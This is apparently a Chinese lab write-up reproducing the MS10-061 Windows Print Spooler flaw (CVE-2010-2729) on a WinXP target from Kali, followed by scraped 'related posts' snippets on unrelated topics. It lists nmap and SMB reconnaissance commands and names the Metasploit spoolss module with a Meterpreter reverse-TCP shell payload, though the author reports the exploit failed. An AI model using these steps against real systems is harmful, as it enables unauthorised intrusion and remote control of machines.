CVE-2010-2729(MS10-061)
目录
讲在前面
实验环境
实验步骤
一、开启WinXP上打印机共享服务
二、kali攻击
讲在前面
此漏洞中文称为:打印后台程序服务模拟漏洞。目前所有的研究文章总结的漏洞成因为:Windows打印后台程序没有充分的限制访问该服务的问题,攻击者可以对其发起恶意请求间接的在Windows系统目录(%SystemRoot%\System32)中创建文件。该漏洞首次被发现并被利用于著名的
Stuxnet蠕虫
(俗称“震网”)
实验环境
- WinXP
- Kali
实验步骤
一、开启WinXP上打印机共享服务
打开控制面板,找到“打印机和传真”,双击打开后,右键选择“添加打印机”。如下地方的配置请注意
二、kali攻击
1、nmap扫描靶机是否正常开启NetBios和RPC服务
nmap -sS -sU -O -p137-139,445, 192.168.1.122
2、查看netbios名称
nmblookup -A 192.168.1.122
3、查看共享SMB共享资源
smbclient -L \\NetBIOS工作站名字 -I 靶机IP -N或者在主机上执行net share命令
设置参数并攻击
exploit/windows/smb/ms10_061_spoolssPayload:windows/meterpreter/reverse_tcp
总结:
笔者这里并未验证成功,并且在win7上也未能利用成功该漏洞,按照微软官方预警,是影响XP\2003\2008\win7的
影响范围
目前未看到有国内研究员的详细研究文章,此处贴出本文借鉴的实验文章
ms10-061复现
CVE-2010-2729(MS10-061)相关推荐
- 看雪论坛 『Android安全』版优秀和精华帖分类索引
逆向技术基础 < 对某APK的一次分析 > JayL的这篇分析中介绍的工具对初学者依然值得参考. < android一个crackme分析和破解 > zhaokang的Crac ...
- 『Android安全』版优秀和精华帖分类索引
逆向技术基础 < 对某APK的一次分析 > JayL的这篇分析中介绍的工具对初学者依然值得参考. < android一个crackme分析和破解 > zhaokang的Crac ...
- Android安全』版优秀和精华帖分类索引
http://www.kanxue.com/bbs/showthread.php?t=179524&viewgoodnees=1&prefixid= 逆向技术基础 <对某APK的 ...
- 永恒之蓝MS17-010
永恒之蓝MS17-010 实验概述 Ms17-010漏洞又称永恒之蓝漏洞,自从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了"明星".在过去的五 ...
- 看个AV也中招之cve-2010-2553漏洞分析
试想:某一天,你的基友给你了一个视频文件,号称是陈老师拍的苍老师的老师题材的最新电影.avi,你满心欢喜,在确定文件格式确实为avi格式后,愉快的脱下裤子准备欣赏,打开后却发现什么也没有,而随后你的基 ...
- Android 安全学习
转载地址:http://bbs.pediy.com/showthread.php?t=179524&viewgoodnees=1&prefixid= 逆向技术基础 < 对某APK ...
- 如何找到相似Graph?DeepMind提出超越GNN的图匹配网络
选自arxiv 作者:Yujia Li.Chenjie Gu.Thomas Dullien等 机器之心编译 参与:李诗萌.路雪 近日,DeepMind 和谷歌联合进行了一项研究,该研究提出了一种执行相 ...
- 基于bootstrap实现的在线商城前端整站源码,页面齐全
大家好,今天给大家介绍一款,基于bootstrap实现的在线商城前端整站源码,功能很齐全(图1).送给大家哦,获取方式在本文末尾. 图1 商品列表页(图2) 图2 商品详情页(图3) 图3 分类导航菜 ...
- 【转】2010全球最值得模仿的230个网站
从全球千万计的网站中选出最具创意的230家网站进行介绍,其奇思妙想,令人叹为观止,开阔眼界,给人以启示,使人产生联想的火花.当然其中一些竞争已经比较惨烈,比如groupon模式,大家务必擦亮眼睛辨别, ...
- CVE PoC的精选列表(三)
CVE-2017-0146 Microsoft Windows Vista SP2中的SMBv1服务器:Windows Server 2008 SP2和R2 SP1; Windows 7 SP1:Wi ...
最新文章
- Go语言源码分析CAS的实现和Java如出一辙
- 华中农大在土壤矿物-微生物相互作用研究方面取得新进展
- Algs4-1.4.12找出两个有序数组的公共元素-方法1
- android读取短信内容简书,Android 获取App信息
- pythonturtle怎么写_让Python的turtle命令更简短(译)
- 常用netbeans快捷键
- NE2018届校招内推笔试——数据挖掘
- android listview 移动到顶部,android listview滚动到顶部
- 打印六级准考证显示服务器,英语六级考试准考证及打印说明
- 云宏大讲坛 | 灵活轻便的云宏CNware虚拟防火墙
- WIFI小车记录四:用Adobe Illustrator绘制应用磁贴
- android bugly 错误分析,Android使用bugly捕捉异常
- require与import的区别和使用(CommonJS规范和es6规范)
- 计算机应用技术视频剪辑,万能的剪辑、合并视频、音频的技术 爱剪辑使用教程...
- 微信 android兼容性问题怎么解决方案,微信7.0版本与EMUI系统兼容性问题,华为官方是这样回复的...
- JAVA高级---(2)15分钟入门JVM底层原理
- c语言游戏代码(c语言制作小游戏)
- 百慕大将于下周宣布推出加密货币友好银行
- Microsoft Visual Studio Installer Projects下载缓慢下载不动的解决办法
- mysql触发器任务